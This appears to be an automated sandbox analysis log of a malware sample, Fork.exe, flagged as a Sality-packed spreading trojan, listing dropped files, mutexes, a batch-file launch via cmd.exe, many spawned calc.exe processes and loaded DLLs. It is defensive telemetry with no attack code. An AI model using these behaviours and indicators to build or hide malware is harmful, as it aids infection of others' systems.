      Source: Fork.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, type: DROPPED | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
      Source: C:\doxt.pif, type: DROPPED | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
      Source: doxt.pif.0.dr | Static PE information: Section .text
      Source: winrhbwc.exe.0.dr | Static PE information: Section .text
      Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@149/5@30/2
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_908_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_548_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_488_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_616_
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_764_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_768_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_736_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_404_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_980_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_856_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_480_
      Source: C:\Users\user\Desktop\Fork.exe | Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_624_
      Source: C:\Users\user\Desktop\Fork.exe | File created: C:\Users\user\AppData\Local\Temp\6028.tmp
      Source: C:\Users\user\Desktop\Fork.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Users\user\Desktop\Fork.exe | File read: C:\Windows\system.ini
      Source: C:\Users\user\Desktop\Fork.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Fork.exe | Virustotal: Detection: 85%
      Source: Fork.exe | ReversingLabs: Detection: 97%
      Source: unknown | Process created: C:\Users\user\Desktop\Fork.exe "C:\Users\user\Desktop\Fork.exe"
      Source: C:\Users\user\Desktop\Fork.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: unknown | Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Users\user\Desktop\Fork.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc.exe
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\calc.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\calc.exe Section loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exe Section loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exe Section loaded: version.dll
      Source: C:\Windows\System32\calc.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\calc.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\calc.exe Section loaded: wkscli.dll
      Source: C:\Windows\System32\calc.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\calc.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\calc.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\calc.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\calc.exe Section loaded: mlang.dll
      Source: C:\Windows\System32\calc.exe Section loaded: wininet.dll
      Source: C:\Windows\System32\calc.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\calc.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\calc.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\calc.exe Section loaded: twinui.appcore.dll
      Source: C:\Windows\System32\calc.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\calc.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\calc.exe Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\calc.exe Section loaded: mrmcorer.dll
      Source: C:\Windows\System32\calc.exe Section loaded: windows.staterepositorycore.dll
      Source: C:\Windows\System32\calc.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\calc.exe Section loaded: bcp47mrm.dll
      Source: C:\Windows\System32\calc.exe Section loaded: windows.ui.dll
      Source: C:\Windows\System32\calc.exe Section loaded: windowmanagementapi.dll
      Source: C:\Windows\System32\calc.exe Section loaded: textinputframework.dll
      Source: C:\Windows\System32\calc.exe Section loaded: inputhost.dll
      Source: C:\Windows\System32\calc.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exe Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exe Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\calc.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\calc.exe Section loaded: kernel.appcore.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vccorlib140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: concrt140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: kernel.appcore.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wintypes.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coremessaging.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47langs.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: iertutil.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dcomp.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.datatransfer.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wldp.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: ntmarta.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rometadata.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.appcore.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositorycore.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windowmanagementapi.dll
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textinputframework.dll
